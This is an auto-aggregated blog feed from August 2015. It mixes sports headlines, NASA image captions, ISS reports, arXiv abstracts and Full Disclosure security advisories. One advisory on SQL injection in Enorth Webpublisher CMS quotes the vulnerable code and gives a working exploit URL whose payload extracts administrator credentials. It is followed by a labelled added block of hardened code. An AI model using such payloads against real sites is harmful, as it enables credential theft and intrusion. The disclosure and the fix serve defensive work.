Saturday, August 15, 2015

anonymous

Jacek Janiczak · Anonymous Just for fun:) follow me on my fb http://ift.tt/1LeAzoj or check my portfolio www.yaceky.com about 11 hours ago.

from Google Alert - anonymous http://ift.tt/1gLtcai
via IFTTT

Orioles Highlight: Chris Davis hits 2 HRs, the 2nd a walk-off, in 4-3 win over A's; Davis 34 HR, 15 since All-Star break (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Ravens: John Harbaugh uses political analogy when talking about training NFL officials, says "I'm going Trump here" (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Dortmund, Leicester earn impressive league victories

LONDON (AP) Borussia Dortmund looks to be finding its stride again in the Bundesliga under new coach Thomas Tuchel, while Claudio Ranieri surprisingly has Leicester atop the Premier League standings.

from FOX Sports Digital http://ift.tt/1DTBMim
via IFTTT

Casillas keeps clean sheet in debut win for Porto

LISBON, Portugal (AP) Former Real Madrid goalkeeper Iker Casillas kept a clean sheet in his Portuguese league debut on Saturday, when FC Porto beat Guimaraes 3-0 to start its season.

from FOX Sports Digital http://ift.tt/1HOjhqn
via IFTTT

Zenit slips to defeat as CSKA tops Russian table

MOSCOW (AP) Reigning champion Zenit St. Petersburg suffered its first home loss in the Russian Premier League in nine months Saturday, allowing its old rival CSKA Moscow to open up a lead at the top of the table.

from FOX Sports Digital http://ift.tt/1HOjeed
via IFTTT

Mexico defender Moreno joins PSV from Espanyol

BARCELONA, Spain (AP) Mexico defender Hector Moreno is joining Dutch club PSV Eindhoven on a transfer from Espanyol.

from FOX Sports Digital http://ift.tt/1DVYohX
via IFTTT

Orioles: OF Henry Urrutia recalled from Triple-A (.292, 10 HR, 50 RBI in 107 games); OF Junior Lake optioned to Triple-A (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Stoke scores 2 late goals, salvages 2-2 draw at Spurs

LONDON (AP) Stoke scored twice in the final 12 minutes to salvage a 2-2 draw at Tottenham in the Premier League on Saturday, keeping both teams without a win after two rounds this season.

from FOX Sports Digital http://ift.tt/1IRuevb
via IFTTT

Saint-Etienne concedes late goal in 1-1 draw vs. Bordeaux

PARIS (AP) Saint-Etienne's poor record against Bordeaux continued as it conceded a last minute goal to draw 1-1 in the French league on Saturday.

from FOX Sports Digital http://ift.tt/1TGvYQf
via IFTTT

Promoted Norwich beats Sunderland 3-1 in Premier League

SUNDERLAND, England (AP) Sunderland lost its second straight Premier League game of the season on Saturday, beaten 3-1 by newly promoted Norwich at the Stadium of Light.

from FOX Sports Digital http://ift.tt/1TGfMhH
via IFTTT

Surprising Leicester earns 2nd straight Premier League win

MANCHESTER, England (AP) After being relegation candidates for most of last season, Leicester could be spending more time at the other end of the Premier League table this time around.

from FOX Sports Digital http://ift.tt/1TGfM1m
via IFTTT

Schalke begins Bundesliga with 3-0 win at Werder Bremen

BERLIN (AP) Schalke started its Bundesliga season with a 3-0 victory at Werder Bremen on Saturday while promoted Ingolstadt claimed its first top-level win.

from FOX Sports Digital http://ift.tt/1IRqObI
via IFTTT

Spurs sign Njie to bolster striker options

LONDON (AP) Tottenham signed Cameroon striker Clinton Njie from Lyon on a five-year contract on Saturday to fill the gap left by the departure of Roberto Soldado.

from FOX Sports Digital http://ift.tt/1IQTcee
via IFTTT

Anonymous

Anonymous, by Jacek Janiczak. Aug 15, 2015. 1 like, 21 views. http://drbl.in/pGzm

from Google Alert - anonymous http://ift.tt/1WsrwDn
via IFTTT

Orioles Highlight: Manny Machado hits walk-off 2-run HR in 13th in 8-6 win over A's; Adam Jones 3-run HR, Chris Davis HR (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Comet Dust over Enchanted Rock


Dusty debris from periodic Comet Swift-Tuttle was swept up by planet Earth this week. Vaporized by their passage through the dense atmosphere at 59 kilometers per second, the tiny grains produced a stream of Perseid meteors. A bright, colorful Perseid meteor flash was captured during this 20 second exposure. It made its ephemeral appearance after midnight on August 12, in the moonless skies over the broad granite dome of Enchanted Rock State Natural Area, central Texas, USA. Below the Perseid meteor, trees stand in silhouette against scattered lights along the horizon and the faint Milky Way, itself cut by dark clouds of interstellar dust. via NASA http://ift.tt/1JWDAI4

Friday, August 14, 2015

The Merry Andrew by Anonymous

Project Gutenberg · 49,631 free ebooks · 732 by Anonymous. The Merry Andrew by Anonymous. Book Cover. Download; Bibrec ...

from Google Alert - anonymous http://ift.tt/1IPuXwN
via IFTTT

[FD] Sandbox bypass through Google Admin WebView

[FD] ERPSCAN Research Advisory [ERPSCAN-15-012] SAP Afaria 7 XComms – Buffer Overflow

Application: SAP Afaria 7
Versions Affected: SAP Afaria 7, probably others
Vendor URL: http://SAP.com
Bugs: Buffer Overflow
Sent: 13.03.2015
Reported: 14.03.2015
Vendor response: 14.03.2015
Date of Public Advisory: 18.05.2015
Reference: SAP Security Note 2153690
Author: Dmitry Chastukhin (ERPScan)

Description

1. ADVISORY INFORMATION
Title: SAP Afaria 7
Advisory ID: [ERPSCAN-15-012]
Risk: High
Advisory URL: http://ift.tt/1DTMDsa
Date published: 18.05.2015
Vendors contacted: SAP

2. VULNERABILITY INFORMATION
Class: XML External Entity [CWE-121]
Impact: Information disclosure, DoS
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2015-4092

3. VULNERABILITY DESCRIPTION
1) Buffer Overflow: A vulnerability has been discovered in certain landscape configurations of SAP Afaria that utilize XComms for client-to-server communications. XComms is only used for Android, Windows Mobile, and Win32 clients.
2) Information Disclosure: An encrypted password is left in the file system that is not needed for server operation. (CVSS Score: 1.9, LMN|PNN)
3) Denial of Service (DoS): An attacker can remotely exploit the SAP Afaria Package Server, rendering it, and potentially the resources utilized by the Afaria server, unavailable. (CVSS Score: 7.8, NLN|NNC)

4. VULNERABLE PACKAGES
SAP Afaria 7
Other versions are probably affected too, but they were not checked.

5. SOLUTIONS AND WORKAROUNDS
Multiple vulnerabilities have been discovered in certain landscape configurations of SAP Afaria. SAP has released a security patch to address the vulnerabilities. SAP strongly recommends that customers update their landscapes.
Patch Instructions:
1) Download hotfix.
- SAP Afaria 7 SP5: Download Hotfix 11
2) Apply server hotfix (SAP Security Note 2153690)
SAP takes any security-related reports very seriously, and we will notify our customers as relevant new information on this topic becomes available. Customers may also contact SAP support by raising a customer incident on the component MOB-AFA.

6. AUTHOR
Dmitry Chastukhin (ERPScan)

7. TECHNICAL DESCRIPTION
An attacker can generate and send a special request to the server to exploit a buffer overflow vulnerability.

8. REPORT TIMELINE
Sent: 13.03.2015
Reported: 14.03.2015
Vendor response: 14.03.2015
Date of Public Advisory: 18.05.2015

9. REFERENCES
http://ift.tt/1DTMDsa

10. ABOUT ERPScan Research
The company's expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications. It has achieved multiple acknowledgments from the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!). ERPScan researchers are proud to have exposed new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be nominated for the best server-side vulnerability at BlackHat 2013. ERPScan experts have been invited to speak, present, and train at 60+ prime international security conferences in 25+ countries across the continents. These include BlackHat, RSA, HITB, and private SAP trainings in several Fortune 2000 companies. ERPScan researchers lead the project EAS-SEC, which is focused on enterprise application security research and awareness. They have published 3 exhaustive annual award-winning surveys about SAP security. ERPScan experts have been interviewed by leading media resources and featured in specialized info-sec publications worldwide. These include Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, and Chinabyte, to name a few. We have highly qualified experts on staff with experience in many different fields of security, from web applications and mobile/embedded to reverse engineering and ICS/SCADA systems, accumulating their experience to conduct the best SAP security research.

11. ABOUT ERPScan
ERPScan is one of the most respected and credible Business Application Security providers. Founded in 2010, the company operates globally. Named an Emerging vendor in Security by CRN and distinguished by more than 25 other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to improve the security of their latest solutions. ERPScan's primary mission is to close the gap between technical and business security. We provide solutions to secure ERP systems and business-critical applications from both cyber attacks and internal fraud. Our clients are usually large enterprises, Fortune 2000 companies, and managed service providers whose requirements are to actively monitor and manage the security of vast SAP landscapes on a global scale. Our flagship product is ERPScan Security Monitoring Suite for SAP. This multi award-winning innovative software is the only solution on the market certified by SAP SE covering all tiers of SAP security: vulnerability assessment, source code review, and Segregation of Duties. The largest companies from diverse industries like oil and gas, banking, retail, even nuclear power installations as well as consulting companies have successfully deployed the software. ERPScan Security Monitoring Suite for SAP is specifically designed for enterprises to continuously monitor changes in multiple SAP systems. It generates and analyzes trends in user friendly dashboards, manages risks, tasks, and can export results to external systems. These features enable central management of SAP system security with minimal time and effort. We follow the sun and function in two hubs located in the Netherlands and the US to operate local offices and partner network spanning 20+ countries around the globe. This enables monitoring cyber threats in real time and providing agile customer support.

Address USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA, 94301
Phone: 650.798.5255
Twitter: @erpscan
Scoop-it: Business Application Security
http://erpscan.com

Source: Gmail -> IFTTT-> Blogger

Bilbao routs Barcelona 4-0 in 1st leg of Spanish Super Cup

BILBAO, Spain (AP) Athletic Bilbao roared to a stunning 4-0 victory over Barcelona in the first leg of the Spanish Super Cup after striker Aritz Aduriz picked apart the European champions with a second-half hat trick on Friday.

from FOX Sports Digital http://ift.tt/1IRyx7A
via IFTTT

Bayern kicks off season with 5-0 win over Hamburg

FRANKFURT, Germany (AP) Bayern Munich kicked off its bid for an unprecedented fourth straight Bundesliga title by cruising past hapless Hamburger SV 5-0 on Friday.

from FOX Sports Digital http://ift.tt/1hCWDfv
via IFTTT

Monaco held to goalless draw by Lille in French league

MONACO (AP) A superb performance from Lille goalkeeper Vincent Enyeama held Monaco to a goalless draw at home in the French league on Friday.

from FOX Sports Digital http://ift.tt/1N8dtzS
via IFTTT

FIFA bribery suspect agrees his extradition to Nicaragua

BERN, Switzerland (AP) Switzerland's justice ministry says it has approved the extradition of FIFA bribery case suspect Julio Rocha to Nicaragua.

from FOX Sports Digital http://ift.tt/1Lcksrj
via IFTTT

Prosecutor seeks extradition of more FIFA defendants

NEW YORK (AP) A U.S. prosecutor says his office is in extradition negotiations with lawyers of defendants in the FIFA (FEE'-fuh) bribery soccer probe.

from FOX Sports Digital http://ift.tt/1Lc8gqu
via IFTTT

Newcomer Buerki picked over veteran Weidenfeller in Dortmund

DORTMUND, Germany (AP) Newcomer Roman Buerki has been picked over veteran Roman Weidenfeller as Borussia Dortmund's starting goalkeeper in the Bundesliga.

from FOX Sports Digital http://ift.tt/1JXbyfA
via IFTTT

Bundesliga newcomer Darmstadt signs defender Gyoergy Garics

DARMSTADT, Germany (AP) Promoted Darmstadt says it has signed Austria defender Gyoergy Garics, one day before the club marks its return to the Bundesliga after 33 years.

from FOX Sports Digital http://ift.tt/1Wp9bXT
via IFTTT

Swiss players banned for cash to team that beat league rival

BERN, Switzerland (AP) Two Swiss top-tier players have been suspended for 12 matches over illegal payments to another team in last season's promotion chase.

from FOX Sports Digital http://ift.tt/1J8kNJ2
via IFTTT

ISS Daily Summary Report – 08/13/15

HRP Operations: Kelly completed his last Journals session for the week. Yui completed his Flight Day 15 (FD15) VO2 Max Session and, with Kelly's assistance, stowed the equipment. Journals obtains information on behavioral and human issues that are relevant to the design of equipment and procedures and sustained human performance during extended-duration missions. The Sprint investigation evaluates the use of high intensity, low volume exercise training to minimize loss of muscle, bone, and cardiovascular function in ISS crewmembers during long-duration missions.

Synchronized Position Hold, Engage, Reorient, Experimental Satellites (SPHERES) Zero Robotics Dry Run: Kononenko and Yui performed a session of this experiment. The SPHERES Zero Robotics investigation establishes an opportunity for high school students to design research for the ISS. As part of a competition, students write algorithms for the SPHERES satellites to accomplish tasks relevant to future space missions. The algorithms are tested by the SPHERES team and the best designs are selected for the competition to operate the SPHERES satellites on board the ISS.

Space Headaches: Yui and Lindgren completed their weekly Space Headaches questionnaire. Headaches can be a common complaint during spaceflight. The Space Headaches experiment improves the understanding of such conditions, which helps in the development of methods to alleviate associated symptoms, and improve the well-being and performance of crew members in orbit. This can also improve the knowledge of similar conditions on Earth.

Alpha Magnetic Spectrometer-02 (AMS-02) Hard Drive Swap: Lindgren completed a regular hard drive swap on the AMS Laptop. The AMS-02 looks for evidence of dark energy and dark matter, along with very high-energy radiation coming from distant stars that could harm crewmembers traveling to Mars. AMS-02 has collected and analyzed billions of cosmic ray events and identified 9 million of these as electrons or positrons (antimatter). The number of high energy positrons increases steadily rather than decaying, conflicting with theoretical models, and indicates a yet to be identified source of positrons. Researchers also observed a plateau in the positron growth curve and need additional data to determine why. Results suggest that high-energy positrons and cosmic ray electrons may come from different and mysterious sources. Solving the origin of cosmic rays and antimatter increases understanding of our galaxy.

AAA Inlet Flow Measurements in OGS, Water Recovery System (WRS)1 Racks: Following last week's low Velocicalc reading of the air flow rate into the OGS Rack AAA inlet, on Tuesday the crew cleaned the OGS AAA. Today the crew performed new Velocicalc measurements to confirm the flow rate after the cleaning. Results from the OGS Rack AAA inlet readings are now within acceptable limits. The crew also took measurements of the air flow rate going into the WRS-1 Rack AAA Inlet. The WRS-1 air flow rate is lower than expected; ground teams are evaluating the data to determine if any additional actions are required.

Water Recovery System (WRS) Separator Plumbing Assembly (SPA) Vent Line Build: For several months, ground teams have suspected the SPA vent hose is restricted due to microbial growth. There is no microbial control in the purge lines and no designated way to clean them if growth occurs. Since there are no spare SPA vent hoses onboard, earlier this week Kelly built an alternate SPA Vent Line by removing the end fittings from an existing Iodine Removal Hose. Today he installed this hose to eliminate the restriction and return the Urine Processing Assembly (UPA) to nominal operations.

Internal Thermal Control System (ITCS) Sample Collection: Lindgren conducted ITCS fluid sampling from N2 Low Temperature Loop (LTL) and N3 sample ports. This maintenance is performed periodically to monitor the quality of the water in the ITCS loops.

Mobile Servicing System (MSS) Operations: Today, the Robotics Ground Controllers powered up the MSS in preparation for the HTV5 Offset Grapples Practice Session. Kelly, Lindgren and Yui practiced maneuvering the Space Station Remote Manipulator System (SSRMS) into the grapple envelope of the Special Purpose Dexterous Manipulator (SPDM) Power Data Grapple Fixture (PDGF). They performed this several times and then performed a run during which the Robotics Ground Controllers safed the SSRMS to simulate a failure. The crew recovered by switching from the Cupola Robotic Workstation (RWS) to the Lab RWS and backed the SSRMS away. The crew then returned to the Cupola RWS and performed three more runs (without safing). After the Offset Grapples Practice session, the Robotics Ground Controllers reconfigured the MSS for nominal operations and maneuvered the SSRMS to the HTV5 High Hover position ready for HTV5 Dragon capture on 20 August 2015. MSS performance today was nominal.

Today's Planned Activities
All activities were completed unless otherwise noted.
Calf Volume Measurement / r/g 9603
CONSTANTA-2 r/g 9596
Water Recovery System (WRS) – Separator Plumbing Assembly (SPA) Vent Line R&R
AMS – Historical Photography
AMS – Hard Drive Exchange
Docking mechanism removal and installation of two hatch tools on DC1 external hatch cover r/g 9602 [Aborted]
SPRINT – Hardware Setup
CONSTANTA-2. Prep and Execute Session 5 Run / r/g 9596
Removal of Portable Repress Tank in SM [РО] and stowage
SPHERES – Experiment OBT
Study of veins in lower extremities / r/g 9604
SPHERES – Science Operations Conference
SPHERES – Payload Conference
SPHERES – Experiment Hardware Setup
SPHERES – Hardware Setup and Checkout
ITCS Low Temperature Loop Sampling in the LAB
Terminate the 1st Orlan-MK 825М3 Battery Pack discharge No.1267271171
Orlan-MK Equipment Pre-pack for Stowage and Disposal after EVA / r/g 9587
Node 2 – Low Temperature Loop (LTL) – Internal Thermal Control System (ITCS) – Sample Collection
SPRINT – Experiment Ops
EVA Tool Stowage, IMS Ops. Window Cleaner Ops. Test Sealed Unit Ops / r/g 9606
WRS – Recycle Tank Fill
HABIT – Hardware activation [Deferred]
PAO Event
HMS – Food Frequency Questionnaire
WRS – Recycle Tank Fill
EVA Tool Stowage, IMS Ops. Window cleaner ops. Test Sealed Unit Ops / r/g 9606
SPHERES – Hardware Installation and Test
SPRINT – Payload Closeout Ops
WRS – Recycle Tank Fill
SHD – Weekly Questionnaire
RWS – Hardware […]

from ISS On-Orbit Status Report http://ift.tt/1hC5z4Y
via IFTTT

Facebook Fired An Intern After He Exposes How to Track Users' Location

Previously, we posted about a privacy issue in Facebook messenger; Aran Khanna, a Harvard University student, discovered ‘A Marauder’s Map’ that could sense and give the geolocations of your friends on the messenger. Khanna had received an opportunity to work as an intern for Facebook… …But destiny had planned something else for him, as after publicly stating the risk associated with


from The Hacker News http://ift.tt/1Kln8wN
via IFTTT

I have a new follower on Twitter


Upol Ehsan
Lead, #Research & Development ♦ Philosopher of Mind ♦ #Social #entrepreneur ♦ Futurist ♦ #InternetOfThngs and Open #innovation advocate ♦ @manUnited fan

http://t.co/YlAzioxwqX
Following: 2801 - Followers: 3389

August 14, 2015 at 08:03AM via Twitter http://twitter.com/UpolEhsan

French league relegation spots kept to 3 after court ruling

PARIS (AP) France's highest administrative court has provisionally upheld the national football federation's decision to keep the number of teams relegated from the top league to three.

from FOX Sports Digital http://ift.tt/1ErmPPg
via IFTTT

Barcelona sends reserve player Adama Traore to Aston Villa

BARCELONA, Spain (AP) Barcelona has agreed to send reserve team player Adama Traore to English club Aston Villa.

from FOX Sports Digital http://ift.tt/1ErghQG
via IFTTT

Ransomware Attacks Threaten Wearable Devices and Internet of Things

Are you a proud owner of a Smartwatch, a Smart TV, a Smart fridge, a Smart lock, an Internet-enabled car, or live in a smart city? Caution! Recently, it has been reported that the growth of the Internet of Things would eventually lead cyber criminals to make lots of money, as they have started attacking the Internet of Things for ransom. Yes, the latest interest of the cyber


from The Hacker News http://ift.tt/1N72Tcg
via IFTTT

Leipzig given 2-0 German Cup win after lighter hits referee

BERLIN (AP) A German football federation tribunal has awarded second-division team RB Leipzig a 2-0 win over third-tier club Osnabrueck in a German Cup match after the referee was hit on the head by a lighter during the match and the game was abandoned.

from FOX Sports Digital http://ift.tt/1h9lM1s
via IFTTT

I have a new follower on Twitter


Max Foundry
We build and develop the awesome WordPress Button Plugin http://t.co/jWWuwPeoJn, WordPress Gallery Platform http://t.co/0cH2HebgC2 and http://t.co/9opivbIdKU
Columbus & San Francisco
http://t.co/dEwhk3iuKQ
Following: 817 - Followers: 4458

August 14, 2015 at 05:45AM via Twitter http://twitter.com/maxfoundry

Windows 10 Doesn't Stop Spying on You, Even After Disabling Its Creepy Features

In our previous articles, we raised concern about Windows 10 privacy issues, including its controversial Wi-Fi Sense feature. Also, to cope with these issues, I provided you a one-click solution to fix all privacy compromising features that allow Microsoft to track users. But unfortunately, all those efforts got wasted because Microsoft still tracks you, even after you harden your


from The Hacker News http://ift.tt/1TzF2q0
via IFTTT

I have a new follower on Twitter


RSIP Vision
We provide cutting-edge image processing & computer vision R&D. Follow us for pixel & nerd news. @dr_felicityp tweets. For more detail please check out our site!
Worldwide
http://t.co/TW6nYc7VYM
Following: 889 - Followers: 835

August 14, 2015 at 01:04AM via Twitter http://twitter.com/RSIPvision

Moonless Meteors and the Milky Way


Have you watched the Perseid meteor shower? Though the annual shower's predicted peak was last night, meteor activity should continue tonight (August 13/14), best enjoyed by just looking up in clear, dark skies after midnight. Of course, this year's Perseid shower has the advantage of being active near the August 14 New Moon. Since the nearly New Moon doesn't rise before the morning twilight many fainter meteors are easier to spot until then, with no interference from bright moonlight. The Perseid meteor shower last occurred near a New Moon in 2013. That's when the exposures used to construct this image were made, under dark, moonless skies from Hvar Island off the coast of Croatia. The widefield composite includes 67 meteors streaming from the heroic constellation Perseus, the shower's radiant, captured during 2013 August 8-14 against a background of faint zodiacal light and the Milky Way. The next moonless Perseid meteor shower will be in August 2018. via NASA http://ift.tt/1JV4IHC

Thursday, August 13, 2015

Ravens: QB Joe Flacco nearly perfect, rookie DL Carl Davis impresses in preseason opener, writes Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Offerte su Amazon (@legrandiofferte) favorited one of your Tweets!

Offerte su Amazon favorited your Tweet: Patrick McGuire @mistermcguire: [FD] APPLE-SA-2015-08-13-3 iOS 8.4.1 ift.tt/1DRzf83

Source: Gmail -> IFTTT-> Blogger

Overeaters Anonymous

Overeaters Anonymous is a group of women and men who use the Twelve Steps of Alcoholics Anonymous to recover from compulsive eating and ...

from Google Alert - anonymous http://ift.tt/1faQCF6
via IFTTT

Multiple-Path Selection for new Highway Alignments using Discrete Algorithms. (arXiv:1508.03064v1 [cs.DS])

This paper addresses the problem of finding multiple near-optimal, spatially-dissimilar paths that can be considered as alternatives in the decision making process, for finding optimal corridors in which to construct a new road. We further consider combinations of techniques for reducing the costs associated with the computation and increasing the accuracy of the cost formulation. Numerical results for five algorithms to solve the dissimilar multipath problem show that a "bidirectional approach" yields the fastest running times and the most robust algorithm. Further modifications of the algorithms to reduce the running time were tested and it is shown that running time can be reduced by an average of 56 percent without compromising the quality of the results.



from cs.AI updates on arXiv.org http://ift.tt/1h8c5QW
via IFTTT

Generation of Multimedia Artifacts: An Extractive Summarization-based Approach. (arXiv:1508.03170v1 [cs.AI])

We explore methods for content selection and address the issue of coherence in the context of the generation of multimedia artifacts. We use audio and video to present two case studies: generation of film tributes, and lecture-driven science talks. For content selection, we use centrality-based and diversity-based summarization, along with topic analysis. To establish coherence, we use the emotional content of music, for film tributes, and ensure topic similarity between lectures and documentaries, for science talks. Composition techniques for the production of multimedia artifacts are addressed as a means of organizing content, in order to improve coherence. We discuss our results considering the above aspects.



from cs.AI updates on arXiv.org http://ift.tt/1hAv7PT
via IFTTT

Talking about the Moving Image: A Declarative Model for Image Schema Based Embodied Perception Grounding and Language Generation. (arXiv:1508.03276v1 [cs.AI])

We present a general theory and corresponding declarative model for the embodied grounding and natural language based analytical summarisation of dynamic visuo-spatial imagery. The declarative model (encompassing spatio-linguistic abstractions, image schemas, and a spatio-temporal feature based language generator) is modularly implemented within Constraint Logic Programming (CLP). The implemented model is such that primitives of the theory, e.g., pertaining to space and motion, image schemata, are available as first-class objects with `deep semantics' suited for inference and query. We demonstrate the model with select examples broadly motivated by areas such as film, design, geography, smart environments where analytical natural language based externalisations of the moving image are central from the viewpoint of human interaction, evidence-based qualitative analysis, and sensemaking.

Keywords: moving image, visual semantics and embodiment, visuo-spatial cognition and computation, cognitive vision, computational models of narrative, declarative spatial reasoning



from cs.AI updates on arXiv.org http://ift.tt/1L9LVac
via IFTTT

Joint Optimization of Masks and Deep Recurrent Neural Networks for Monaural Source Separation. (arXiv:1502.04149v3 [cs.SD] UPDATED)

Monaural source separation is important for many real world applications. It is challenging because, with only a single channel of information available, without any constraints, an infinite number of solutions are possible. In this paper, we explore joint optimization of masking functions and deep recurrent neural networks for monaural source separation tasks, including monaural speech separation, monaural singing voice separation, and speech denoising. The joint optimization of the deep recurrent neural networks with an extra masking layer enforces a reconstruction constraint. Moreover, we explore a discriminative criterion for training neural networks to further enhance the separation performance. We evaluate the proposed system on the TSP, MIR-1K, and TIMIT datasets for speech separation, singing voice separation, and speech denoising tasks, respectively. Our approaches achieve 2.30--4.98 dB SDR gain compared to NMF models in the speech separation task, 2.30--2.48 dB GNSDR gain and 4.32--5.42 dB GSIR gain compared to existing models in the singing voice separation task, and outperform NMF and DNN baselines in the speech denoising task.



from cs.AI updates on arXiv.org http://ift.tt/1BhZEJR
via IFTTT

[FD] [CVE-2015-5617]Enorth Webpublisher CMS SQL Injection from delete_pending_news.jsp cbNewsid

Title:
====
[CVE-2015-5617] Enorth Webpublisher CMS SQL Injection from delete_pending_news.jsp cbNewsid

Vendor:
======
http://ift.tt/1L9CmYU
Enorth Webpublisher CMS is deployed on tens of thousands of web sites, with nearly thousands of business users in the government, enterprise, scientific research, education and media sectors.

Versions Affected:
==============
All versions

Author:
======
xin.wang (xin.wang(at)dbappsecurity.com.cn)

Vulnerability Description:
====================
/pub/m_pending_news/delete_pending_news.jsp

    <%
    String[] newsIdGroup;
    newsIdGroup = request.getParameterValues("cbNewsId");
    if (newsIdGroup == null || newsIdGroup.length == 0) {
        throw new P3Exception("mbx_news_submit_empty_news_id");
    } else {
        penTran.deletePendingNews(newsIdGroup);  // raw request values passed straight through
    }
    %>

/WEB-INF/classes/cn/com/enorth/pub3/m_news/PendingNewsBean.class

    public void deletePendingNews(String[] newsIds) throws Exception {
        Connection cn = null;
        PreparedStatement pstm = null;
        try {
            StringBuffer buf = new StringBuffer();
            buf.append("delete from tn_pending_news where news_id in (");
            int i = 0;
            for (int len = newsIds.length; i < len; i++) {
                // each cbNewsId value is concatenated into the SQL text, not bound as a parameter
                buf.append(newsIds[i]).append(",");
            }
            buf.append("-1)");
            cn = P3DBTools.getPubConnection();
            pstm = cn.prepareStatement(buf.toString());
            pstm.executeUpdate(); // execute
            cn.commit();
        } catch (Exception ex) {
            P3DBTools.rollback(cn);
            throw ex;
        } finally {
            P3DBTools.freeConnection(cn);
        }
    }

Exploit:
======
http://ift.tt/1Nep8MO)%20and%201=ctxsys.drithsx.sn(1,(select%20USER_NAME||PASS_WORD%20from%20TN_USER%20WHERE%20USER_ID=1))—

Vulnerability Disclosure Timeline:
===========================
2015-07-28 Found The Vulnerability
2015-08-02 Submitted To The Vendor
2015-08-03 Fixed
2015-08-13 Public Disclosure
================================================================================================

Source: Gmail -> IFTTT-> Blogger
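The root cause in the advisory above is that every cbNewsId value is spliced into the SQL text of the IN (...) list. As an added illustration (not the vendor's code and not part of the advisory), here is a hardened replacement for deletePendingNews() that rejects any id that is not a plain integer and binds each accepted id as a JDBC parameter; it assumes the caller supplies the Connection, and the table and error key are taken from the advisory.

```java
// Added example, not Enorth's code: a hardened replacement for the
// deletePendingNews() method quoted in the advisory. Two layers of defence:
//   1) parseNewsIds() refuses any value that is not a plain integer, so
//      input of the shape "1) and 1=..." never reaches the database;
//   2) buildDeleteSql() emits one "?" placeholder per id and the ids are
//      bound with setLong(), so user input never becomes part of the SQL text.
// Assumed: the caller hands in an open JDBC Connection (the original used
// P3DBTools.getPubConnection(), which is not reproduced here).
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;

public class SafePendingNewsDelete {

    /** Parses each submitted id, rejecting anything but 1-18 decimal digits
     *  (18 digits always fits in a long). No spaces, quotes or parentheses pass. */
    static List<Long> parseNewsIds(String[] newsIds) {
        List<Long> ids = new ArrayList<>();
        for (String raw : newsIds) {
            String s = raw == null ? "" : raw.trim();
            if (!s.matches("\\d{1,18}")) {
                throw new IllegalArgumentException("invalid news id: " + raw);
            }
            ids.add(Long.parseLong(s));
        }
        return ids;
    }

    /** Builds "delete from tn_pending_news where news_id in (?,?,?)" with one
     *  placeholder per id; the statement text is fully fixed before binding. */
    static String buildDeleteSql(int count) {
        StringBuilder sql = new StringBuilder("delete from tn_pending_news where news_id in (");
        for (int i = 0; i < count; i++) {
            sql.append(i == 0 ? "?" : ",?");
        }
        return sql.append(")").toString();
    }

    /** Same contract as the original method, but validated and parameterised.
     *  Returns the number of rows deleted. */
    public static int deletePendingNews(Connection cn, String[] newsIds) throws SQLException {
        if (newsIds == null || newsIds.length == 0) {
            throw new IllegalArgumentException("mbx_news_submit_empty_news_id");
        }
        List<Long> ids = parseNewsIds(newsIds);   // throws before any SQL is prepared
        String sql = buildDeleteSql(ids.size());
        try (PreparedStatement pstm = cn.prepareStatement(sql)) {
            for (int i = 0; i < ids.size(); i++) {
                pstm.setLong(i + 1, ids.get(i));   // JDBC parameter indexes are 1-based
            }
            int deleted = pstm.executeUpdate();
            cn.commit();
            return deleted;
        } catch (SQLException ex) {
            cn.rollback();
            throw ex;
        }
    }

    public static void main(String[] args) {
        // Demonstrates the input gate without a database. The third value is a
        // constructed sample in the shape of the advisory's payload and is rejected.
        System.out.println(buildDeleteSql(3));            // ... in (?,?,?)
        System.out.println(parseNewsIds(new String[]{"17", "42"}));
        try {
            parseNewsIds(new String[]{"17", "42", "1) and 1=1--"});
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The digit-only check is the detection point worth logging: a cbNewsId value that fails it is a request that should never occur from the CMS's own form and is a reasonable trigger for an application-layer alert.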

[FD] BFS-SA-2015-002: OpenSSH PAM Privilege Separation Vulnerabilities

Blue Frost Security GmbH
http://ift.tt/1IH5eGS
research(at)bluefrostsecurity.de
BFS-SA-2015-002
13-August-2015

Source: Gmail -> IFTTT-> Blogger

[FD] APPLE-SA-2015-08-13-4 OS X Server v4.1.5

Source: Gmail -> IFTTT-> Blogger

[FD] APPLE-SA-2015-08-13-3 iOS 8.4.1


[FD] APPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update 2015-006


[FD] APPLE-SA-2015-08-13-1 Safari 8.0.8, Safari 7.1.8, and Safari 6.2.8




[FD] SAP Security Notes August 2015

Real Salt Lake signs forward Juan Manuel Martinez

SALT LAKE CITY (AP) Real Salt Lake has signed Argentinian forward Juan Manuel Martinez as a designated player.

from FOX Sports Digital http://ift.tt/1JfUNgU
via IFTTT

Max Foundry (@maxfoundry) favorited one of your Tweets!

Max Foundry favorited your Tweet: Patrick McGuire @mistermcguire: Re: [FD] Stored XSS in Google Analytics by Yoast Premium allows privileged users to attack other users (WordPress … ift.tt/1TuP46l


Change this Facebook Privacy Setting That Could Allow Hackers to Steal Your Identity

Facebook User: Who Can Find Me...? Hacker: Yes, I CAN!! A Security Researcher claimed “digi-crims could easily scan the population of an entire country to find targets”. Reza Moaiandin, technical director at Salt Agency, has figured out a way to exploit an important Facebook feature to gather personal data belonging to the users. Facebook Privacy Setting That Makes Your Identity


from The Hacker News http://ift.tt/1gEm9jE
via IFTTT

Is AA Right for You?

Do you think you have a problem with alcohol? New to AA? Think you have a problem? Call the Chicago Area Service Office and ask for help: ...

from Google Alert - anonymous http://ift.tt/1J2F52i
via IFTTT

Blatter urges European soccer to revive his '6 plus 5' rule

